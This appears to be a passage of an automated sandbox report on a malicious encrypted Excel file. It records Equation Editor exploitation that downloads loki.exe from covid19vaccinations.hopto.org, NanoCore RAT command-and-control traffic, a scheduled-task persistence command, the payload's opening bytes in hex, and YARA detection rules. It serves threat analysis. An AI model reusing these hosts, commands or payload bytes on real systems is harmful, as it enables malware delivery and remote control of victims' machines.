                                                              Contains Workbook/Book Stream:False
                                                              Contains PowerPoint Document Stream:False
                                                              Contains Visio Document Stream:False
                                                              Contains ObjectPool Stream:
                                                              Flash Objects Count:
                                                              Contains VBA Macros:False

                                                              Streams

                                                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                              General
                                                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                              File Type:data
                                                              Stream Size:64
                                                              Entropy:2.73637206947
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                              General
                                                              Stream Path:\x6DataSpaces/DataSpaceMap
                                                              File Type:data
                                                              Stream Size:112
                                                              Entropy:2.7597816111
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                              General
                                                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                              File Type:data
                                                              Stream Size:200
                                                              Entropy:3.13335930328
                                                              Base64 Encoded:False
                                                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                              General
                                                              Stream Path:\x6DataSpaces/Version
                                                              File Type:data
                                                              Stream Size:76
                                                              Entropy:2.79079600998
                                                              Base64 Encoded:False
                                                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 2304072
                                                              General
                                                              Stream Path:EncryptedPackage
                                                              File Type:data
                                                              Stream Size:2304072
                                                              Entropy:7.99990846905
                                                              Base64 Encoded:True
                                                              Data ASCII:3 ( # . . . . . . . . . . . . % . S . . . v . . . . . . . . . . i . . { % . . I . 4 l . . 6 . { . e p . . . . . ) \\ P \\ k u . j = . . E . . . . . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . . . . X . K . . = . . . . , . . .
                                                              Data Raw:33 28 23 00 00 00 00 00 00 cd bc cd f2 d2 b2 25 d6 53 c2 ee 0f 76 12 19 e0 94 a5 08 9c cd d5 82 69 95 01 7b 25 85 bc 49 88 34 6c f6 8b 36 c6 7b a6 65 70 00 14 f6 c2 c1 29 5c 50 5c 6b 75 a1 6a 3d e1 0a 45 cd ad 89 f3 b9 1e f2 ab 2c b4 f3 1c 0b 19 58 bb 4b 12 c9 3d b9 1e f2 ab 2c b4 f3 1c 0b 19 58 bb 4b 12 c9 3d b9 1e f2 ab 2c b4 f3 1c 0b 19 58 bb 4b 12 c9 3d b9 1e f2 ab 2c b4 f3 1c
                                                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                              General
                                                              Stream Path:EncryptionInfo
                                                              File Type:data
                                                              Stream Size:224
                                                              Entropy:4.52198973456
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . i . . j . . ) . . I p I . . . . . . . . . . g . \\ . . Z . . . . . T Y . . . k . . . Q h c B J . . . . . q . ] . . . . . . . . x .
                                                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              04/09/21-11:43:48.719844TCP2025019ET TROJAN Possible NanoCore C2 60B491681144192.168.2.2279.134.225.30
                                                              04/09/21-11:43:54.757973TCP2025019ET TROJAN Possible NanoCore C2 60B491691144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:01.038344TCP2025019ET TROJAN Possible NanoCore C2 60B491701144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:07.033637TCP2025019ET TROJAN Possible NanoCore C2 60B491711144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:11.644676TCP2025019ET TROJAN Possible NanoCore C2 60B491721144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:17.680820TCP2025019ET TROJAN Possible NanoCore C2 60B491731144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:25.005691TCP2025019ET TROJAN Possible NanoCore C2 60B491741144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:31.055728TCP2025019ET TROJAN Possible NanoCore C2 60B491751144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:37.077620TCP2025019ET TROJAN Possible NanoCore C2 60B491761144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:43.114822TCP2025019ET TROJAN Possible NanoCore C2 60B491771144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:49.294384TCP2025019ET TROJAN Possible NanoCore C2 60B491781144192.168.2.2279.134.225.30
                                                              04/09/21-11:44:55.728367TCP2025019ET TROJAN Possible NanoCore C2 60B491791144192.168.2.2279.134.225.30
                                                              04/09/21-11:45:04.841421TCP2025019ET TROJAN Possible NanoCore C2 60B491801144192.168.2.2279.134.225.30
                                                              04/09/21-11:45:10.899258TCP2025019ET TROJAN Possible NanoCore C2 60B491811144192.168.2.2279.134.225.30
                                                              04/09/21-11:45:16.890821TCP2025019ET TROJAN Possible NanoCore C2 60B491821144192.168.2.2279.134.225.30

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 9, 2021 11:43:32.359095097 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:32.523919106 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.524023056 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:32.524485111 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:32.690557003 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.690589905 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.690613985 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.690741062 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.690788984 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:32.690833092 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:32.855998993 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.856034994 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.856055021 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.856066942 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.856079102 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.856108904 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.856136084 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.856183052 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:32.856219053 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:32.856249094 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021155119 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021233082 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021303892 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021352053 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021361113 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021395922 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021399975 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021433115 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021482944 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021487951 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021536112 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021591902 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021631956 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021662951 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021668911 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021672010 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021707058 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021708965 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021744013 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021786928 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021822929 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021830082 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021866083 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021867037 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021900892 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021913052 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021950006 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.021954060 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.021995068 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.023443937 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.186916113 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187032938 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187079906 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187141895 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187200069 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187228918 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187252045 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187283993 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187308073 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187334061 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187374115 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187392950 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187417984 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187442064 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187489986 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187494040 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187531948 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187550068 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187575102 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187637091 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187690020 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187721014 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187763929 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187781096 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187800884 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187810898 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187833071 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187839031 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187875986 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187890053 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187911034 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187917948 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187942028 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.187948942 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.187985897 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.188000917 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.188026905 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.188031912 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.188074112 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.188085079 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.188110113 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.188112974 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.188148975 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.188162088 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.188185930 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.188190937 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.188220978 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.188241005 CEST4916780192.168.2.2234.220.10.254
                                                              Apr 9, 2021 11:43:33.188257933 CEST804916734.220.10.254192.168.2.22
                                                              Apr 9, 2021 11:43:33.188267946 CEST4916780192.168.2.2234.220.10.254

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 9, 2021 11:43:32.322695971 CEST5219753192.168.2.228.8.8.8
                                                              Apr 9, 2021 11:43:32.342818975 CEST53521978.8.8.8192.168.2.22

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Apr 9, 2021 11:43:32.322695971 CEST192.168.2.228.8.8.80xd372Standard query (0)covid19vaccinations.hopto.orgA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Apr 9, 2021 11:43:32.342818975 CEST8.8.8.8192.168.2.220xd372No error (0)covid19vaccinations.hopto.org34.220.10.254A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • covid19vaccinations.hopto.org

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.224916734.220.10.25480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 9, 2021 11:43:32.524485111 CEST0OUTGET /loki.exe HTTP/1.1
                                                              Accept: */*
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Host: covid19vaccinations.hopto.org
                                                              Connection: Keep-Alive
                                                              Apr 9, 2021 11:43:32.690557003 CEST2INHTTP/1.1 200 OK
                                                              Date: Fri, 09 Apr 2021 09:43:08 GMT
                                                              Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16
                                                              Last-Modified: Fri, 09 Apr 2021 07:13:49 GMT
                                                              ETag: "1c7800-5bf84e7cc6f70"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 1865728
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-msdownload
                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ac fe 6f 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d2 15 00 00 a4 06 00 00 00 00 00 de f0 15 00 00 20 00 00 00 00 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 1c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 f0 15 00 57 00 00 00 00 20 16 00 74 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 d0 15 00 00 20 00 00 00 d2 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 16 00 00 02 00 00 00 d4 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 74 a0 06 00 00 20 16 00 00 a2 06 00 00 d6 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f0 15 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 7f 14 00 b4 70 01 00 03 00 00 00 cf 00 00 06 44 ed 05 00 8c 92 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 1f 00 00 0a 02 03 7d 01 00 00 04 02 28 20 00 00 0a 6f 21 00 00 0a 7d 03 00 00 04 2a 00 06 2a 00 00 13 30 03 00 03 01 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 45 08 00 00 00 02 00 00 00 1d 00 00 00 38 00 00 00 5a 00 00 00 75 00 00 00 97 00 00 00 b2 00 00 00 cd 00 00 00 16 2a 02 15 7d 01 00 00 04 02 20 5d f9 34 53 7d 02 00 00 04 02 17 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 a6 bd 51 f9 7d 02 00 00 04 02 18 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 4b 6d da 95 61 7d 02 00 00 04 02 19 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 2c bc c2 c2 7d 02 00 00 04 02 1a 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 02 7b 04 00 00 04 20 14 10 3d 87 61 7d 02 00 00 04 02 1b 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 94 13 e8 f4 7d 02 00 00 04 02 1c 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 02 20 22 47 f5 52 7d 02 00 00 04 02 1d 7d 01 00 00 04 17 2a 02 15 7d 01 00 00 04 16 2a 00 1e 02 7b 02 00 00 04 2a 1a 73 22 00 00 0a 7a 00 32 02 7b 02 00 00 04 8c 66 00 00 01 2a 00 00 00 13 30 02 00 3c 00 00 00 02 00 00 11 02 7b 01 00 00 04 1f fe 33 1d 02 7b 03 00 00 04 28 20 00 00 0a 6f 21 00 00 0a 33 0b 02 16 7d 01 00 00 04 02 0a 2b 07 16 73 01 00 00 06 0a 06 02 7b 05 00 00 04 7d 04 00 00 04 06 2a 1e 02
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELo` @ @W t H.text `.reloc@B.rsrct @@HpDz(}( o!}**0{E8Zu*} ]4S}}*} Q}}*}{ Kma}}*} ,}}*}{ =a}}*} }}*} "GR}}*}*{*s"z2{f*0<{3{( o!3}+s{}*


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Start time:11:42:44
                                                              Start date:09/04/2021
                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                              Imagebase:0x13fae0000
                                                              File size:27641504 bytes
                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:11:43:06
                                                              Start date:09/04/2021
                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                              Imagebase:0x400000
                                                              File size:543304 bytes
                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:11:43:17
                                                              Start date:09/04/2021
                                                              Path:C:\Users\Public\vbc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\Public\vbc.exe'
                                                              Imagebase:0xfd0000
                                                              File size:1865728 bytes
                                                              MD5 hash:A74ECE32BC1B6DB38A2D379C7FC78D2C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, Author: Florian Roth
                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 17%, ReversingLabs
                                                              Reputation:low

                                                              General

                                                              Start time:11:43:20
                                                              Start date:09/04/2021
                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp'
                                                              Imagebase:0x6a0000
                                                              File size:179712 bytes
                                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:11:43:21
                                                              Start date:09/04/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Imagebase:0x300000
                                                              File size:45216 bytes
                                                              MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2365145581.0000000002501000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2364697576.00000000004B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2364697576.00000000004B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, Author: Florian Roth
                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, Author: Florian Roth
